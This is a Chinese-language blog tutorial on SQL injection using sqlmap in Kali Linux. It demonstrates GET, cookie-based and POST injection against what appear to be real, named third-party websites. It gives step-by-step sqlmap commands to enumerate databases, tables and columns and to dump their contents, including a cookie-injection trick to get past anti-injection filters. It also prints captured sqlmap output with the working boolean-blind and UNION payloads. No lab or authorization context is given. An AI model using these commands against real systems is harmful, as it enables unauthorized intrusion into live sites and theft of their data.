kali之sql注入

ASP:
1.網址後面加上一撇 ' 報錯  and 1=1 正常顯示,and1=2報錯  網址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14    (get注入

2.kali Linux打開終端 輸入命令 sqlmap -u 網址 --dbs --current-user (-u 輸入目標網址 --dbs表示全部的數據庫)
3.結果顯示出了服務器的的操做系統爲Windows2003或是 XP,數據庫類型等信息,沒有顯示出current user
4.kali Linux打開終端 輸入命令 sqlmap -u 網址 --tables 最後會顯示出幾個表名
5.kali Linux打開終端 輸入命令 sqlmap -u 網址 -T 表名 --columns ,會拆解出幾個列名(-T 指定表名 --columns表明全部的列)
6.kali Linux打開終端 輸入命令 sqlmap -u 網址 -T 表名 -C 列名1,列名2 --dump (-C指定要得到的數據的列名,--dump表示下載數據



7.sql不能注入,採起cookie注入 例如  :sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2
8.猜解表段也是同樣的:sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2


若是說那個站點他裝了防注入程序 拿咱們正規的注入就不成效果就用到cookie中轉註入

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --level 2

Place: Cookie
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=230 AND 1870=1870

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-3659 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(117)&CHR(120)&CHR(97)&CHR(113)&CHR(106)&CHR(83)&CHR(65)&CHR(100)&CHR(105)&CHR(111)&CHR(87)&CHR(110)&CHR(113)&CHR(112)&CHR(113)&CHR(113)&CHR(115)&CHR(106)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
[23:30:15] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[23:30:15] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xaweichi.com'

能夠看到是cookies方式的注入

猜解表段也是同樣的 sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2

猜解字段sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --columns -T manage --level 2

而後猜解內容

[4 columns]
+---------+-------------+
| Column  | Type        |
+---------+-------------+
| classid | numeric     |
| id      | numeric     |
| orderid | numeric     |
| title   | non-numeric |

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --dump C "classid,id" -T manage --level 2






9.cookie注入不行用post注入
今天講sqlmap post搜索框的注入



http://www.zjyingsong.com/product.asp

post注入框的注入原理 你們能夠本身百度一下哦!

要進行post注入咱們首先要抓包 。。

用burpsuite

打開瀏覽器

代理8080端口

好了 隨便輸入一個1字 burpsuite已經抓到包了

key=1&x=23&y=4

這條是有用的

而後咱們啓動sqlmap 構造一下 sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4"
Place: POST
Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=1%' AND 1393=1393 AND '%'='&x=24&y=9

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: key=-3532%' UNION ALL SELECT NULL,NULL,CHR(113)&CHR(104)&CHR(101)&CHR(110)&CHR(113)&CHR(103)&CHR(109)&CHR(84)&CHR(80)&CHR(98)&CHR(100)&CHR(74)&CHR(105)&CHR(102)&CHR(102)&CHR(113)&CHR(105)&CHR(114)&CHR(108)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&x=24&y=9
---
[23:58:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[23:58:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.zjyingsong.com'
Place: POST


嗯   post型注入 而後咱們就能夠猜解了

和上節課的語法徹底如出一轍 sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --tables //猜解表段

sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --columns -T 表段 //猜解字段

sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --dump C "內容,內容," -T 剛纔的表段 //猜解內容

PHP:
1.網址後面加上一撇 ' 報錯,能夠看到數據庫信息
2.kali Linux打開終端 輸入命令 sqlmap -u 網址 --dbs --current-user ,提示id 有注入漏洞
3.kali Linux打開終端 輸入命令 sqlmap -u 網址 --dbms mysql -D 數據庫 --tables  (--dbms 指定數據庫 -D指定具體數據庫(名稱 ))
4.kali Linux打開終端 輸入命令 sqlmap -u 網址 --dbms mysql  --tables   第3步在指定具體數據庫的狀況下沒有返回任何表,這裏直接拆解表名
5..kali Linux打開終端 輸入命令 sqlmap -u 網址 --dbms mysql -T 表名 --columns
6.kali Linux打開終端 輸入命令 sqlmap -u 網址 --dbms mysql -T 表名 -C 列名,列名 --dumpmysql

相關文章
相關標籤/搜索